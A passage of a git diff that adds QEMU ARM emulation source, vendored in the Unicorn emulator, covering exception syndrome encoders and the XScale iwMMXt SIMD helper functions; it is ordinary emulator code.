0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) + | (crn << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_cp15_rt_trap(int cv, int cond, int opc1, int opc2, + int crn, int crm, int rt, int isread, + bool is_thumb) +{ + return (EC_CP15RTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) + | (crn << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_cp14_rrt_trap(int cv, int cond, int opc1, int crm, + int rt, int rt2, int isread, + bool is_thumb) +{ + return (EC_CP14RRTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc1 << 16) + | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_cp15_rrt_trap(int cv, int cond, int opc1, int crm, + int rt, int rt2, int isread, + bool is_thumb) +{ + return (EC_CP15RRTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc1 << 16) + | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_fp_access_trap(int cv, int cond, bool is_thumb) +{ + return (EC_ADVSIMDFPACCESSTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 
0 : ARM_EL_IL) + | (cv << 24) | (cond << 20); +} + +static inline uint32_t syn_insn_abort(int same_el, int ea, int s1ptw, int fsc) +{ + return (((unsigned int)EC_INSNABORT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (ea << 9) | (s1ptw << 7) | fsc; +} + +static inline uint32_t syn_data_abort(int same_el, int ea, int cm, int s1ptw, + int wnr, int fsc) +{ + return (((unsigned int) EC_DATAABORT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (ea << 9) | (cm << 8) | (s1ptw << 7) | (wnr << 6) | fsc; +} + +static inline uint32_t syn_swstep(int same_el, int isv, int ex) +{ + return (((unsigned int)EC_SOFTWARESTEP) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (isv << 24) | (ex << 6) | 0x22; +} + +static inline uint32_t syn_watchpoint(int same_el, int cm, int wnr) +{ + return (((unsigned int)EC_WATCHPOINT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (cm << 8) | (wnr << 6) | 0x22; +} + +static inline uint32_t syn_breakpoint(int same_el) +{ + return (((unsigned int) EC_BREAKPOINT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | ARM_EL_IL | 0x22; +} + +/* Update a QEMU watchpoint based on the information the guest has set in the + * DBGWCR_EL1 and DBGWVR_EL1 registers. + */ +void hw_watchpoint_update(ARMCPU *cpu, int n); +/* Update the QEMU watchpoints for every guest watchpoint. This does a + * complete delete-and-reinstate of the QEMU watchpoint list and so is + * suitable for use after migration or on reset. + */ +void hw_watchpoint_update_all(ARMCPU *cpu); +/* Update a QEMU breakpoint based on the information the guest has set in the + * DBGBCR_EL1 and DBGBVR_EL1 registers. + */ +void hw_breakpoint_update(ARMCPU *cpu, int n); +/* Update the QEMU breakpoints for every guest breakpoint. This does a + * complete delete-and-reinstate of the QEMU breakpoint list and so is + * suitable for use after migration or on reset. 
+ */ +void hw_breakpoint_update_all(ARMCPU *cpu); + +/* Callback function for when a watchpoint or breakpoint triggers. */ +void arm_debug_excp_handler(CPUState *cs); + +#ifdef CONFIG_USER_ONLY +static inline bool arm_is_psci_call(ARMCPU *cpu, int excp_type) +{ + return false; +} +#else +/* Return true if the r0/x0 value indicates that this SMC/HVC is a PSCI call. */ +bool arm_is_psci_call(ARMCPU *cpu, int excp_type); +/* Actually handle a PSCI call */ +void arm_handle_psci_call(ARMCPU *cpu); +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/iwmmxt_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/iwmmxt_helper.c new file mode 100644 index 0000000..a506914 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/iwmmxt_helper.c @@ -0,0 +1,672 @@ +/* + * iwMMXt micro operations for XScale. + * + * Copyright (c) 2007 OpenedHand, Ltd. + * Written by Andrzej Zaborowski <andrew@openedhand.com> + * Copyright (c) 2008 CodeSourcery + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +#include <stdlib.h> +#include <stdio.h> + +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/helper-proto.h" + +/* iwMMXt macros extracted from GNU gdb. */ + +/* Set the SIMD wCASF flags for 8, 16, 32 or 64-bit operations.
*/ +#define SIMD8_SET( v, n, b) ((v != 0) << ((((b) + 1) * 4) + (n))) +#define SIMD16_SET(v, n, h) ((v != 0) << ((((h) + 1) * 8) + (n))) +#define SIMD32_SET(v, n, w) ((v != 0) << ((((w) + 1) * 16) + (n))) +#define SIMD64_SET(v, n) ((v != 0) << (32 + (n))) +/* Flags to pass as "n" above. */ +#define SIMD_NBIT -1 +#define SIMD_ZBIT -2 +#define SIMD_CBIT -3 +#define SIMD_VBIT -4 +/* Various status bit macros. */ +#define NBIT8(x) ((x) & 0x80) +#define NBIT16(x) ((x) & 0x8000) +#define NBIT32(x) ((x) & 0x80000000) +#define NBIT64(x) ((x) & 0x8000000000000000ULL) +#define ZBIT8(x) (((x) & 0xff) == 0) +#define ZBIT16(x) (((x) & 0xffff) == 0) +#define ZBIT32(x) (((x) & 0xffffffff) == 0) +#define ZBIT64(x) (x == 0) +/* Sign extension macros. */ +#define EXTEND8H(a) ((uint16_t) (int8_t) (a)) +#define EXTEND8(a) ((uint32_t) (int8_t) (a)) +#define EXTEND16(a) ((uint32_t) (int16_t) (a)) +#define EXTEND16S(a) ((int32_t) (int16_t) (a)) +#define EXTEND32(a) ((uint64_t) (int32_t) (a)) + +uint64_t HELPER(iwmmxt_maddsq)(uint64_t a, uint64_t b) +{ + a = (( + EXTEND16S((a >> 0) & 0xffff) * EXTEND16S((b >> 0) & 0xffff) + + EXTEND16S((a >> 16) & 0xffff) * EXTEND16S((b >> 16) & 0xffff) + ) & 0xffffffff) | ((uint64_t) ( + EXTEND16S((a >> 32) & 0xffff) * EXTEND16S((b >> 32) & 0xffff) + + EXTEND16S((a >> 48) & 0xffff) * EXTEND16S((b >> 48) & 0xffff) + ) << 32); + return a; +} + +uint64_t HELPER(iwmmxt_madduq)(uint64_t a, uint64_t b) +{ + a = (( + ((a >> 0) & 0xffff) * ((b >> 0) & 0xffff) + + ((a >> 16) & 0xffff) * ((b >> 16) & 0xffff) + ) & 0xffffffff) | (( + ((a >> 32) & 0xffff) * ((b >> 32) & 0xffff) + + ((a >> 48) & 0xffff) * ((b >> 48) & 0xffff) + ) << 32); + return a; +} + +uint64_t HELPER(iwmmxt_sadb)(uint64_t a, uint64_t b) +{ +#define abs(x) (((x) >= 0) ? 
x : -x) +#define SADB(SHR) abs((int) ((a >> SHR) & 0xff) - (int) ((b >> SHR) & 0xff)) + return + SADB(0) + SADB(8) + SADB(16) + SADB(24) + + SADB(32) + SADB(40) + SADB(48) + SADB(56); +#undef SADB +} + +uint64_t HELPER(iwmmxt_sadw)(uint64_t a, uint64_t b) +{ +#define SADW(SHR) \ + abs((int) ((a >> SHR) & 0xffff) - (int) ((b >> SHR) & 0xffff)) + return SADW(0) + SADW(16) + SADW(32) + SADW(48); +#undef SADW +} + +uint64_t HELPER(iwmmxt_mulslw)(uint64_t a, uint64_t b) +{ +#define MULS(SHR) ((uint64_t) ((( \ + EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ + ) >> 0) & 0xffff) << SHR) + return MULS(0) | MULS(16) | MULS(32) | MULS(48); +#undef MULS +} + +uint64_t HELPER(iwmmxt_mulshw)(uint64_t a, uint64_t b) +{ +#define MULS(SHR) ((uint64_t) ((( \ + EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ + ) >> 16) & 0xffff) << SHR) + return MULS(0) | MULS(16) | MULS(32) | MULS(48); +#undef MULS +} + +uint64_t HELPER(iwmmxt_mululw)(uint64_t a, uint64_t b) +{ +#define MULU(SHR) ((uint64_t) ((( \ + ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ + ) >> 0) & 0xffff) << SHR) + return MULU(0) | MULU(16) | MULU(32) | MULU(48); +#undef MULU +} + +uint64_t HELPER(iwmmxt_muluhw)(uint64_t a, uint64_t b) +{ +#define MULU(SHR) ((uint64_t) ((( \ + ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ + ) >> 16) & 0xffff) << SHR) + return MULU(0) | MULU(16) | MULU(32) | MULU(48); +#undef MULU +} + +uint64_t HELPER(iwmmxt_macsw)(uint64_t a, uint64_t b) +{ +#define MACS(SHR) ( \ + EXTEND16((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff)) + return (int64_t) (MACS(0) + MACS(16) + MACS(32) + MACS(48)); +#undef MACS +} + +uint64_t HELPER(iwmmxt_macuw)(uint64_t a, uint64_t b) +{ +#define MACU(SHR) ( \ + (uint32_t) ((a >> SHR) & 0xffff) * \ + (uint32_t) ((b >> SHR) & 0xffff)) + return MACU(0) + MACU(16) + MACU(32) + MACU(48); +#undef MACU +} + +#define NZBIT8(x, i) \ + SIMD8_SET(NBIT8((x) & 0xff), SIMD_NBIT, i) | \ + SIMD8_SET(ZBIT8((x) & 0xff), SIMD_ZBIT, i) 
+#define NZBIT16(x, i) \ + SIMD16_SET(NBIT16((x) & 0xffff), SIMD_NBIT, i) | \ + SIMD16_SET(ZBIT16((x) & 0xffff), SIMD_ZBIT, i) +#define NZBIT32(x, i) \ + SIMD32_SET(NBIT32((x) & 0xffffffff), SIMD_NBIT, i) | \ + SIMD32_SET(ZBIT32((x) & 0xffffffff), SIMD_ZBIT, i) +#define NZBIT64(x) \ + SIMD64_SET(NBIT64(x), SIMD_NBIT) | \ + SIMD64_SET(ZBIT64(x), SIMD_ZBIT) +#define IWMMXT_OP_UNPACK(S, SH0, SH1, SH2, SH3) \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, b)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + (((a >> SH0) & 0xff) << 0) | (((b >> SH0) & 0xff) << 8) | \ + (((a >> SH1) & 0xff) << 16) | (((b >> SH1) & 0xff) << 24) | \ + (((a >> SH2) & 0xff) << 32) | (((b >> SH2) & 0xff) << 40) | \ + (((a >> SH3) & 0xff) << 48) | (((b >> SH3) & 0xff) << 56); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, w)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + (((a >> SH0) & 0xffff) << 0) | \ + (((b >> SH0) & 0xffff) << 16) | \ + (((a >> SH2) & 0xffff) << 32) | \ + (((b >> SH2) & 0xffff) << 48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT8(a >> 0, 0) | NZBIT8(a >> 16, 1) | \ + NZBIT8(a >> 32, 2) | NZBIT8(a >> 48, 3); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, l)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + (((a >> SH0) & 0xffffffff) << 0) | \ + (((b >> SH0) & 0xffffffff) << 32); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ub)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + (((x >> SH0) & 0xff) << 0) | \ + (((x >> SH1) & 0xff) << 16) | \ + (((x >> SH2) & 0xff) << 32) | \ + (((x >> SH3) & 0xff) << 48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + 
NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, uw)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + (((x >> SH0) & 0xffff) << 0) | \ + (((x >> SH2) & 0xffff) << 32); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ul)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = (((x >> SH0) & 0xffffffff) << 0); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sb)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + ((uint64_t) EXTEND8H((x >> SH0) & 0xff) << 0) | \ + ((uint64_t) EXTEND8H((x >> SH1) & 0xff) << 16) | \ + ((uint64_t) EXTEND8H((x >> SH2) & 0xff) << 32) | \ + ((uint64_t) EXTEND8H((x >> SH3) & 0xff) << 48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sw)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + ((uint64_t) EXTEND16((x >> SH0) & 0xffff) << 0) | \ + ((uint64_t) EXTEND16((x >> SH2) & 0xffff) << 32); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sl)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = EXTEND32((x >> SH0) & 0xffffffff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ + return x; \ +} +IWMMXT_OP_UNPACK(l, 0, 8, 16, 24) +IWMMXT_OP_UNPACK(h, 32, 40, 48, 56) + +#define IWMMXT_OP_CMP(SUFF, Tb, Tw, Tl, O) \ +uint64_t HELPER(glue(iwmmxt_, glue(SUFF, b)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + CMP(0, Tb, O, 0xff) | CMP(8, Tb, O, 0xff) | \ + CMP(16, Tb, O, 0xff) | CMP(24, Tb, O, 0xff) | \ + CMP(32, Tb, O, 0xff) | CMP(40, Tb, O, 0xff) | \ + CMP(48, Tb, O, 0xff) | CMP(56, 
Tb, O, 0xff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_, glue(SUFF, w)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = CMP(0, Tw, O, 0xffff) | CMP(16, Tw, O, 0xffff) | \ + CMP(32, Tw, O, 0xffff) | CMP(48, Tw, O, 0xffff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | \ + NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_, glue(SUFF, l)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = CMP(0, Tl, O, 0xffffffff) | \ + CMP(32, Tl, O, 0xffffffff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ + return a; \ +} +#define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ + (TYPE) ((b >> SHR) & MASK)) ? (uint64_t) MASK : 0) << SHR) +IWMMXT_OP_CMP(cmpeq, uint8_t, uint16_t, uint32_t, ==) +IWMMXT_OP_CMP(cmpgts, int8_t, int16_t, int32_t, >) +IWMMXT_OP_CMP(cmpgtu, uint8_t, uint16_t, uint32_t, >) +#undef CMP +#define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ + (TYPE) ((b >> SHR) & MASK)) ? 
a : b) & ((uint64_t) MASK << SHR)) +IWMMXT_OP_CMP(mins, int8_t, int16_t, int32_t, <) +IWMMXT_OP_CMP(minu, uint8_t, uint16_t, uint32_t, <) +IWMMXT_OP_CMP(maxs, int8_t, int16_t, int32_t, >) +IWMMXT_OP_CMP(maxu, uint8_t, uint16_t, uint32_t, >) +#undef CMP +#define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ + OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) +IWMMXT_OP_CMP(subn, uint8_t, uint16_t, uint32_t, -) +IWMMXT_OP_CMP(addn, uint8_t, uint16_t, uint32_t, +) +#undef CMP +/* TODO Signed- and Unsigned-Saturation */ +#define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ + OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) +IWMMXT_OP_CMP(subu, uint8_t, uint16_t, uint32_t, -) +IWMMXT_OP_CMP(addu, uint8_t, uint16_t, uint32_t, +) +IWMMXT_OP_CMP(subs, int8_t, int16_t, int32_t, -) +IWMMXT_OP_CMP(adds, int8_t, int16_t, int32_t, +) +#undef CMP +#undef IWMMXT_OP_CMP + +#define AVGB(SHR) ((( \ + ((a >> SHR) & 0xff) + ((b >> SHR) & 0xff) + round) >> 1) << SHR) +#define IWMMXT_OP_AVGB(r) \ +uint64_t HELPER(iwmmxt_avgb##r)(CPUARMState *env, uint64_t a, uint64_t b) \ +{ \ + const int round = r; \ + a = AVGB(0) | AVGB(8) | AVGB(16) | AVGB(24) | \ + AVGB(32) | AVGB(40) | AVGB(48) | AVGB(56); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + SIMD8_SET(ZBIT8((a >> 0) & 0xff), SIMD_ZBIT, 0) | \ + SIMD8_SET(ZBIT8((a >> 8) & 0xff), SIMD_ZBIT, 1) | \ + SIMD8_SET(ZBIT8((a >> 16) & 0xff), SIMD_ZBIT, 2) | \ + SIMD8_SET(ZBIT8((a >> 24) & 0xff), SIMD_ZBIT, 3) | \ + SIMD8_SET(ZBIT8((a >> 32) & 0xff), SIMD_ZBIT, 4) | \ + SIMD8_SET(ZBIT8((a >> 40) & 0xff), SIMD_ZBIT, 5) | \ + SIMD8_SET(ZBIT8((a >> 48) & 0xff), SIMD_ZBIT, 6) | \ + SIMD8_SET(ZBIT8((a >> 56) & 0xff), SIMD_ZBIT, 7); \ + return a; \ +} +IWMMXT_OP_AVGB(0) +IWMMXT_OP_AVGB(1) +#undef IWMMXT_OP_AVGB +#undef AVGB + +#define AVGW(SHR) ((( \ + ((a >> SHR) & 0xffff) + ((b >> SHR) & 0xffff) + round) >> 1) << SHR) +#define IWMMXT_OP_AVGW(r) \ +uint64_t HELPER(iwmmxt_avgw##r)(CPUARMState *env, uint64_t 
a, uint64_t b) \ +{ \ + const int round = r; \ + a = AVGW(0) | AVGW(16) | AVGW(32) | AVGW(48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + SIMD16_SET(ZBIT16((a >> 0) & 0xffff), SIMD_ZBIT, 0) | \ + SIMD16_SET(ZBIT16((a >> 16) & 0xffff), SIMD_ZBIT, 1) | \ + SIMD16_SET(ZBIT16((a >> 32) & 0xffff), SIMD_ZBIT, 2) | \ + SIMD16_SET(ZBIT16((a >> 48) & 0xffff), SIMD_ZBIT, 3); \ + return a; \ +} +IWMMXT_OP_AVGW(0) +IWMMXT_OP_AVGW(1) +#undef IWMMXT_OP_AVGW +#undef AVGW + +uint64_t HELPER(iwmmxt_align)(uint64_t a, uint64_t b, uint32_t n) +{ + a >>= n << 3; + a |= b << (64 - (n << 3)); + return a; +} + +uint64_t HELPER(iwmmxt_insr)(uint64_t x, uint32_t a, uint32_t b, uint32_t n) +{ + x &= ~((uint64_t) b << n); + x |= (uint64_t) (a & b) << n; + return x; +} + +uint32_t HELPER(iwmmxt_setpsr_nz)(uint64_t x) +{ + return SIMD64_SET((x == 0), SIMD_ZBIT) | + SIMD64_SET((x & (1ULL << 63)), SIMD_NBIT); +} + +uint64_t HELPER(iwmmxt_bcstb)(uint32_t arg) +{ + arg &= 0xff; + return + ((uint64_t) arg << 0 ) | ((uint64_t) arg << 8 ) | + ((uint64_t) arg << 16) | ((uint64_t) arg << 24) | + ((uint64_t) arg << 32) | ((uint64_t) arg << 40) | + ((uint64_t) arg << 48) | ((uint64_t) arg << 56); +} + +uint64_t HELPER(iwmmxt_bcstw)(uint32_t arg) +{ + arg &= 0xffff; + return + ((uint64_t) arg << 0 ) | ((uint64_t) arg << 16) | + ((uint64_t) arg << 32) | ((uint64_t) arg << 48); +} + +uint64_t HELPER(iwmmxt_bcstl)(uint32_t arg) +{ + return arg | ((uint64_t) arg << 32); +} + +uint64_t HELPER(iwmmxt_addcb)(uint64_t x) +{ + return + ((x >> 0) & 0xff) + ((x >> 8) & 0xff) + + ((x >> 16) & 0xff) + ((x >> 24) & 0xff) + + ((x >> 32) & 0xff) + ((x >> 40) & 0xff) + + ((x >> 48) & 0xff) + ((x >> 56) & 0xff); +} + +uint64_t HELPER(iwmmxt_addcw)(uint64_t x) +{ + return + ((x >> 0) & 0xffff) + ((x >> 16) & 0xffff) + + ((x >> 32) & 0xffff) + ((x >> 48) & 0xffff); +} + +uint64_t HELPER(iwmmxt_addcl)(uint64_t x) +{ + return (x & 0xffffffff) + (x >> 32); +} + +uint32_t HELPER(iwmmxt_msbb)(uint64_t x) +{ + return + ((x >> 
7) & 0x01) | ((x >> 14) & 0x02) | + ((x >> 21) & 0x04) | ((x >> 28) & 0x08) | + ((x >> 35) & 0x10) | ((x >> 42) & 0x20) | + ((x >> 49) & 0x40) | ((x >> 56) & 0x80); +} + +uint32_t HELPER(iwmmxt_msbw)(uint64_t x) +{ + return + ((x >> 15) & 0x01) | ((x >> 30) & 0x02) | + ((x >> 45) & 0x04) | ((x >> 52) & 0x08); +} + +uint32_t HELPER(iwmmxt_msbl)(uint64_t x) +{ + return ((x >> 31) & 0x01) | ((x >> 62) & 0x02); +} + +/* FIXME: Split wCASF setting into a separate op to avoid env use. */ +uint64_t HELPER(iwmmxt_srlw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((x & (0xffffll << 0)) >> n) & (0xffffll << 0)) | + (((x & (0xffffll << 16)) >> n) & (0xffffll << 16)) | + (((x & (0xffffll << 32)) >> n) & (0xffffll << 32)) | + (((x & (0xffffll << 48)) >> n) & (0xffffll << 48)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_srll)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((x & (0xffffffffll << 0)) >> n) | + ((x >> n) & (0xffffffffll << 32)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_srlq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x >>= n; + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_sllw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((x & (0xffffll << 0)) << n) & (0xffffll << 0)) | + (((x & (0xffffll << 16)) << n) & (0xffffll << 16)) | + (((x & (0xffffll << 32)) << n) & (0xffffll << 32)) | + (((x & (0xffffll << 48)) << n) & (0xffffll << 48)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_slll)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((x << n) & (0xffffffffll << 0)) | + ((x & (0xffffffffll << 32)) << n); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | 
NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_sllq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x <<= n; + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_sraw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((uint64_t) ((EXTEND16(x >> 0) >> n) & 0xffff) << 0) | + ((uint64_t) ((EXTEND16(x >> 16) >> n) & 0xffff) << 16) | + ((uint64_t) ((EXTEND16(x >> 32) >> n) & 0xffff) << 32) | + ((uint64_t) ((EXTEND16(x >> 48) >> n) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_sral)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((EXTEND32(x >> 0) >> n) & 0xffffffff) << 0) | + (((EXTEND32(x >> 32) >> n) & 0xffffffff) << 32); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_sraq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (int64_t) x >> n; + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_rorw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((((x & (0xffffll << 0)) >> n) | + ((x & (0xffffll << 0)) << (16 - n))) & (0xffffll << 0)) | + ((((x & (0xffffll << 16)) >> n) | + ((x & (0xffffll << 16)) << (16 - n))) & (0xffffll << 16)) | + ((((x & (0xffffll << 32)) >> n) | + ((x & (0xffffll << 32)) << (16 - n))) & (0xffffll << 32)) | + ((((x & (0xffffll << 48)) >> n) | + ((x & (0xffffll << 48)) << (16 - n))) & (0xffffll << 48)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_rorl)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((x & (0xffffffffll << 0)) >> n) | + ((x >> n) & (0xffffffffll << 32)) | + ((x << (32 - n)) & (0xffffffffll << 0)) | + ((x & (0xffffffffll << 32)) << (32 - n)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + 
NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_rorq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ror64(x, n); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_shufh)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((x >> ((n << 4) & 0x30)) & 0xffff) << 0) | + (((x >> ((n << 2) & 0x30)) & 0xffff) << 16) | + (((x >> ((n << 0) & 0x30)) & 0xffff) << 32) | + (((x >> ((n >> 2) & 0x30)) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +/* TODO: Unsigned-Saturation */ +uint64_t HELPER(iwmmxt_packuw)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | + (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | + (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | + (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); + 